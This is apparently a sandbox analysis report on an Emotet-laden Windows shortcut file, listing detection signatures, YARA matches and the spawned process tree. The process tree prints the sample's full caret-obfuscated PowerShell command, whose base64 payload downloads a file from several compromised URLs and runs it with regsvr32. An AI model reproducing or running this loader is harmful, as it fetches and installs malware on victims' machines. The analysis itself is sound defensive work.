Edit tour
Windows
Analysis Report
RechnungsDetails 2022.20.05_1044.lnk
Overview
General Information
Detection
Emotet
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Windows shortcut file (LNK) starts blacklisted processes
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Suspicious powershell command line found
Machine Learning detection for sample
Suspicious command line found
Powershell drops PE file
Obfuscated command line found
Machine Learning detection for dropped file
Yara detected Obfuscated Powershell
Hides that the sample has been downloaded from the Internet (zone.identifier)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains an invalid checksum
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Detected TCP or UDP traffic on non-standard ports
Registers a DLL
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Queries disk information (often used to detect virtual machines)
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Classification
- System is w10x64
- cmd.exe (PID: 7040 cmdline:
C:\Windows \System32\ cmd.exe" / v:on /c zl kGA07kqp/H VSJK6L7RjY +ay04qYhLT dlRQkqIXeT fVVJIU9NeS f/9YcHLfxy d+ETRqdB8X ||p^o^w^e^ r^s^h^e^l^ l.e^x^e -c "&{$HXG=[ System.Tex t.Encoding ]::ASCII;$ ghT='ICBXc ml0ZS1Ib3N 0ICJYaHFJV SI7JFByb2d yZXNzUHJlZ mVyZW5jZT0 iU2lsZW50b HlDb250aW5 1ZSI7JGxpb mtzPSgiaHR 0cDovL3d3d y5qc29uc2l udGwuY29tL 1J4c0dnb1Z XejkvNEhGa TNaWll0bll ndEVMZ0NIb lovIiwiaHR 0cDovL2NtZ W50YXJ6LjV ';$ufmV='2 LnBsL3RoZW 1lcy96YWxN a1RiLyIsIm h0dHBzOi8v bmFraGFyaW 5pdHdlYmhv c3RpbmcuY2 9tL0hTRFlL TjFYNUdMRi 8iLCJodHRw Oi8vbmNpYS 5kb3Rob21l LmNvLmtyL3 dwLWluY2x1 ZGVzL2x1N0 pialg4WEwx S2FELyIsIm h0dHA6Ly9w aWZmbC5jb2 0vcGlmZmwu Y29tL2EvIi wiaHR0cDov L2RpZ2l0YW xraXRjaGVu LmpwL2ltYW dlcy9QVm4v Iik7JHQ9Il p0TUlqWXgi OyRkPSIkZW 52OlRNUFwu LlwkdCI7bW tkaXIgLWZv cmNlICRkIH wgb3V0LW51 bGw7Zm9yZW FjaCAoJHUg aW4gJGxpbm tzKSB7dHJ5 IHtJV1IgJH UgLU91dEZp bGUgJGRcSU tkemZKdFFw ai5CQ1A7Um Vnc3ZyMzIu ZXhlICIkZF xJS2R6Zkp0 UXBqLkJDUC I7YnJlYWt9 IGNhdGNoIH sgfX0=';$A HI=[System .Convert]: :FromBase6 4String($g hT+$ufmV); $TcqkRL=$H XG.GetStri ng($AHI); iex ($Tcqk RL)} MD5: 4E2ACF4F8A396486AB4268C94A6A245F) - conhost.exe (PID: 7060 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496) - powershell.exe (PID: 7100 cmdline:
powershell .exe -c "& {$HXG=[Sys tem.Text.E ncoding]:: ASCII;$ghT ='ICBXcml0 ZS1Ib3N0IC JYaHFJVSI7 JFByb2dyZX NzUHJlZmVy ZW5jZT0iU2 lsZW50bHlD b250aW51ZS I7JGxpbmtz PSgiaHR0cD ovL3d3dy5q c29uc2ludG wuY29tL1J4 c0dnb1ZXej kvNEhGaTNa Wll0bllndE VMZ0NIblov IiwiaHR0cD ovL2NtZW50 YXJ6LjV';$ ufmV='2LnB sL3RoZW1lc y96YWxNa1R iLyIsImh0d HBzOi8vbmF raGFyaW5pd HdlYmhvc3R pbmcuY29tL 0hTRFlLTjF YNUdMRi8iL CJodHRwOi8 vbmNpYS5kb 3Rob21lLmN vLmtyL3dwL WluY2x1ZGV zL2x1N0pia lg4WEwxS2F ELyIsImh0d HA6Ly9waWZ mbC5jb20vc GlmZmwuY29 tL2EvIiwia HR0cDovL2R pZ2l0YWxra XRjaGVuLmp wL2ltYWdlc y9QVm4vIik 7JHQ9Ilp0T UlqWXgiOyR kPSIkZW52O lRNUFwuLlw kdCI7bWtka XIgLWZvcmN lICRkIHwgb 3V0LW51bGw 7Zm9yZWFja CAoJHUgaW4 gJGxpbmtzK SB7dHJ5IHt JV1IgJHUgL U91dEZpbGU gJGRcSUtke mZKdFFwai5 CQ1A7UmVnc 3ZyMzIuZXh lICIkZFxJS 2R6Zkp0UXB qLkJDUCI7Y nJlYWt9IGN hdGNoIHsgf X0=';$AHI= [System.Co nvert]::Fr omBase64St ring($ghT+ $ufmV);$Tc qkRL=$HXG. GetString( $AHI); iex ($TcqkRL) }" MD5: 95000560239032BC68B4C2FDFCDEF913) - regsvr32.exe (PID: 3008 cmdline:
"C:\Window s\system32 \regsvr32. exe" C:\Us ers\user\A ppData\Loc al\Temp\.. \ZtMIjYx\I KdzfJtQpj. BCP MD5: D78B75FC68247E8A63ACBA846182740E) - regsvr32.exe (PID: 6180 cmdline:
C:\Windows \system32\ regsvr32.e xe "C:\Win dows\syste m32\ZrCipB \RLcE.dll" MD5: D78B75FC68247E8A63ACBA846182740E)
- svchost.exe (PID: 1592 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p -s B ITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 2860 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6244 cmdline:
C:\Windows \System32\ svchost.ex e -k Local SystemNetw orkRestric ted -p -s NcbService MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 6612 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 5900 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- svchost.exe (PID: 3000 cmdline:
C:\Windows \System32\ svchost.ex e -k netsv cs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
- cleanup
⊘No configs have been found
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
SUSP_PowerShell_Caret_Obfuscation_2 | Detects powershell keyword obfuscated with carets | Florian Roth |
| |
JoeSecurity_ObfuscatedPowershell | Yara detected Obfuscated Powershell | Joe Security |
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
|
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security | ||
JoeSecurity_Emotet_1 | Yara detected Emotet | Joe Security |
⊘No Sigma rule has matched
⊘No Snort rule has matched
Click to jump to signature section
Show All Signature Results
AV Detection |
---|
Source: | ReversingLabs: |
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | URL Reputation: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | URL Reputation: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Metadefender: | Perma Link | ||
Source: | ReversingLabs: |
Source: | Joe Sandbox ML: |
Source: | Joe Sandbox ML: |
Source: | Code function: | 4_2_00000001800248B0 |
Networking |
---|
Source: | Network Connect: | Jump to behavior |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | IP Address: |
Source: | HTTP traffic detected: |